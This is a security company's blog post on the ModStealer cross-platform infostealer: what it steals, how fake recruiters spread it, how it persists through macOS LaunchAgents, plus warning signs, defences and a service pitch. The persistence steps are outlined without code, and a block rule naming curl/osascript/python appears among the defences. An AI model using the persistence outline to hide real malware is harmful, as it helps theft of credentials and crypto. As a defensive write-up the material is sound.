Stay updated with the latest Cybersecurity News on our TecnetBlog.

ModStealer Malware: How It Steals Crypto and Evades macOS Security

Written by Jonathan Montoya | Sep 29, 2025 5:08:03 PM

If you work on a Mac, code daily, or handle crypto, this name should be on your radar: ModStealer. It’s a cross-platform infostealer that burst onto the scene, targeting macOS first, but also working on Windows and Linux. The alarming part is not only what it steals, but how it sneaks in and remains unnoticed, even evading Apple’s native defenses and many antivirus solutions.

At TecnetOne, we’ll explain in simple terms what it does, how it attacks, and how you can protect yourself—personally and at the enterprise level.

 

What ModStealer Targets (and Why You’re Probably on Its Radar)

 

The operators behind ModStealer know exactly where the value lies: developers and users handling crypto. They lure victims with fake job offers, cloned “recruiters,” and technical challenges hosted on polished websites or repositories. When you download the so-called “brief” or run an “installer” of a library/tool… the malware comes in.

Once inside, it collects everything it can use to impersonate you:

 

  1. Browser extensions (50+ across Chrome and Safari; targeting Safari is rare and that’s why it stands out).

 

  1. Crypto wallets in browsers (seed phrases, private keys, addresses).

 

  1. Clipboard (if you copied a seed or 2FA code, you’re in trouble).

 

  1. Screenshots (to see what you’re doing without extra permissions).

 

  1. LocalStorage, cookies, and saved credentials (sessions for email, Git, SaaS, banking, etc.).

 

With this, an attacker can log in wherever you log in, sign transactions, swap withdrawal addresses without you noticing, and even gain access to your repos or company systems.

 

The Technical “Trick” That Makes It So Persistent on macOS

 

ModStealer avoids noisy tricks. On macOS it leverages LaunchAgents through launchctl (a native tool) to resume execution at every login. In other words, it registers as if it were a legitimate system process.

  1. Creates discreet files (e.g., sysupdater.dat) in user paths.

  2. Adds a LaunchAgent in ~/Library/LaunchAgents/ with a name and plist that don’t raise suspicion.

  3. Avoids touching elements most antivirus tools prioritize, so it goes unnoticed.

From there, it maintains continuous communication with its C2 (command and control) to send stolen data, receive new commands, and even move laterally across corporate networks when possible.

 

Similar titles: NimDoor: Malware for macOS that reinstalls itself after being removed

 

Why It’s Especially Dangerous

 

  1. Truly cross-platform: the same actor runs campaigns for Mac, Windows, and Linux. It’s not just random variants—it’s a kit designed to hit mixed environments without rewriting half the malware.

 

  1. Defense evasion: by relying on native system mechanisms (LaunchAgents), it looks like normal activity and reduces alerts.

 

  1. Safari + extensions: not many stealers handle Safari so well. If you switched from Chrome “for security,” this won’t save you here.

 

  1. Session hijacking: with valid cookies and tokens, MFA loses strength; attackers jump straight into your accounts.

 

Signs You Might Be Compromised

 

  1. “Recruiters” reaching out via LinkedIn/Telegram/Discord with unrealistic salaries and urgency.
  2. Challenges/briefs asking you to run scripts to “check compatibility” or “set up the environment.”
  3. “Click-to-fix” instructions (ClickFix) telling you to paste commands into Terminal to “activate camera/mic” for a technical interview.
  4. An unknown plist in ~/Library/LaunchAgents/ that launches a binary with names like “update,” “system,” “helper”…
  5. Crypto wallet transactions you didn’t make or withdrawal addresses that mysteriously change.
  6. Active sessions on services from locations you don’t recognize.

 

A VirusTotal user comment reveals how they were contacted by a fake recruiter impersonating a known LinkedIn account (Source: Moonlock)

 

How to Protect Yourself (as an Individual and as a Company)

 

If You’re a User (Dev, Analyst, Trader…)

 

  1. Zero blind commands. Don’t paste into Terminal what you don’t understand. If “the camera fails,” restart the browser/system—don’t follow third-party guides.

 

  1. Isolate tests: use a VM or a separate user profile without keys/credentials; ideally a disposable machine for technical challenges.

 

  1. Wallets out of the browser: use hardware wallets for custody, and never store seed phrases in the clipboard.

 

  1. Check LaunchAgents: in ~/Library/LaunchAgents/ and ~/Library/LaunchDaemons/. If something looks odd, disconnect from the internet, delete the plist (and binary), restart, and change your passwords.

 

  1. Always use passkeys/MFA, and rotate tokens (revoke active sessions in Google, Apple ID, GitHub, etc.).

 

  1. Minimal extensions: uninstall those you don’t use; verify publisher and permissions.

 

  1. Keep macOS and apps updated; Gatekeeper, XProtect, and MRT help when up to date. Enable USB data access lock if you don’t need it.

 

If You Manage IT/Security

 

  1. MDM on all Macs (Jamf, Kandji, Mosyle, Intune…). Enforce:

 

a. Blocking unsigned LaunchAgents or those in unauthorized paths.

 

b. Blocking curl/osascript/python in unapproved contexts (or at least alert on interactive use).

 

c. Extension whitelisting and blocking those with “read/write all” permissions.

 

  1. EDR/XDR rules for persistence via LaunchAgents, anomalies in ~/Library/, repeated screenshots, keychain scraping, and HTTPS exfiltration to new domains.

 

  1. Hardened corporate browser or remote browser isolation to separate privileged sessions from open web browsing.

 

  1. Identity segregation: devs shouldn’t use personal accounts for corporate tasks. Enforce SSO with passkeys, short-lived tokens, and Just-In-Time access.

 

  1. Crypto monitoring: if employees handle assets, monitor withdrawal address changes and unusual signing activity (real-time alerts).

 

  1. DFIR playbooks specific to infostealers: mass revocation of cookies/tokens, secret rotation, refresh token invalidation, and MDM re-enrollment.

 

  1. Anti-ClickFix training: internal simulations where “the camera breaks” and you see if staff paste commands. This educates more than ten PDFs.

 

What If You Suspect Infection?

 

  1. Isolate yourself (airplane mode or disconnect from the corporate network).

 

  1. Export evidence (plist, suspicious binaries, hashes, outbound connections) without executing them.

 

  1. Change passwords from a clean device; revoke sessions across all services.

 

  1. Restore from a trusted backup or reinstall. Continuing with the same system may carry persistence.

 

  1. Rotate API keys, CI/CD tokens, repo secrets, and cloud credentials.

 

  1. For wallets: move funds to a new seed created on a hardware wallet.

 

At TecnetOne, we can analyze your Mac, remove persistence, trace exfiltration, and close gaps within hours.

 

Read more: North Korean Hackers Use Deepfakes on Zoom to Infect Macs

 

How TecnetOne Helps

 

  1. Threat Hunting focused on anomalous LaunchAgents, abuse of launchctl, cookie/localStorage scraping, and exfiltration to emerging domains.

 

  1. MDM hardening for macOS: profiles that block common persistence methods, control scripts, and sign/limit extensions.

 

  1. 24/7 Managed EDR/XDR with custom rules for modern stealers (Safari+Chrome).

 

  1. Incident Response: cleanup, secret rotation, post-breach hardening, and support until the attack cycle is fully closed.

 

  1. Hands-on training (anti-ClickFix, recruiter social engineering, wallet hygiene, developer best practices).

 

Key Takeaways

 

  1. ModStealer isn’t “just another malware”: it steals what makes you you (cookies, tokens, seeds) and camouflages itself as a system process.

 

  1. It spreads through fake job offers and technical challenges: if something asks you to paste commands, be suspicious.

 

  1. With isolation, MDM, EDR/XDR, and disciplined identity management, you can shut it out.

 
View full post